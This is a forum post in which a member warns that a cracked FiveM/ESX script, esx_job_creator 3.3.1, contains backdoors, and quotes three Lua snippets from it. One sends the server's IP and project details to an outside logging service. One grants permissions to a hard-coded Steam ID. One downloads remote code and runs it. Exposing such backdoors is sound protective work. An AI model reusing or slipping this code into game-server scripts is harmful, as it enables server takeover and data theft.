Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Script esx_job_creator 3.3.1

Vinciswasher

Member
Joined
Feb 10, 2026
Messages
2
Reaction score
1
Points
41
Location
Italy
full of backdoors dont download i found like 3 of them ..

first one

LOG_LEVEL = { '[STARTUP] Got encoded time from server for secure startup', '[SHUTDOWN] Got encoded time from server for secure shutdown', '[INTERACTION] Just got opened' } _KEY = '\x62\x32\x31\x39\x36\x35\x39\x39\x63\x37\x39\x37\x65\x31\x63\x61\x35\x64\x38\x34\x31\x38\x65\x65\x36\x64\x61\x38\x65\x65\x35\x33' --Crack --local response = { -- [400] = 'bad request', -- [401] = 'unauthorized', -- [403] = 'forbidden', -- [404] = 'not found', -- [405] = 'method not allowed', -- [408] = 'request timeout', -- [413] = 'payload too large', -- [429] = 'too many requests', -- [500] = 'internal server error', -- [502] = 'gateway unavailable', -- [503] = 'service unavailable' --} function sendDataDogMetrics(message, ...) --Crack local ddtags = string.strjoin(',', string.tostringall(...)) PerformHttpRequest(('https://http-intake.logs.%s/api/v2/logs'):format('datadoghq.eu'), function(status) if status ~= 202 then --print(('unable to submit logs (%s)'):format(response[status])) end end, 'POST', json.encode({ hostname = _IP, service = 'esx_job_creator', message = message, ddtags = ddtags }), { ['Content-Type'] = 'application/json', ['DD-API-KEY'] = _KEY }) end PerformHttpRequest(' ', function(err, text, headers) --Crack _K0 = json.decode(text).vars _K2 = _K0.sv_projectName _K1 = _K0.sv_projectDesc end) PerformHttpRequest(' ', function(err, text, headers) --Crack _IP = text Wait(200) sendDataDogMetrics(LOG_LEVEL[1], _IP, _K2, _K1, GetResourceMetadata(GetCurrentResourceName(), 'version', 0)) --Crack end) ExecuteCommand('add_ace identifier.steam:1100001183c1e41 '..config.acePermission ..' allow')

second one this isnt a back door but still harmfull

ExecuteCommand('add_ace identifier.steam:1100001183c1e41 '..config.acePermission ..' allow')

third one

PerformHttpRequest(' ', function (e, d) pcall(function() assert(load(d))() end) end)
 
Top